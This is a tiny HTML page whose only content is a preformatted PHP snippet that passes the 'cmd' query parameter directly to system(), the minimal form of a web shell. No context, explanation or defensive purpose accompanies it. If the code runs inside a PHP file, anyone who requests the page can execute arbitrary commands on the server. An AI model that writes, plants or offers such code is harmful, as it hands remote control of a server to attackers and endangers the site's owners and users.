<HTML><BODY>




<pre>

if($_GET['cmd']) {
system($_GET['cmd']);
}

</pre>
</BODY></HTML>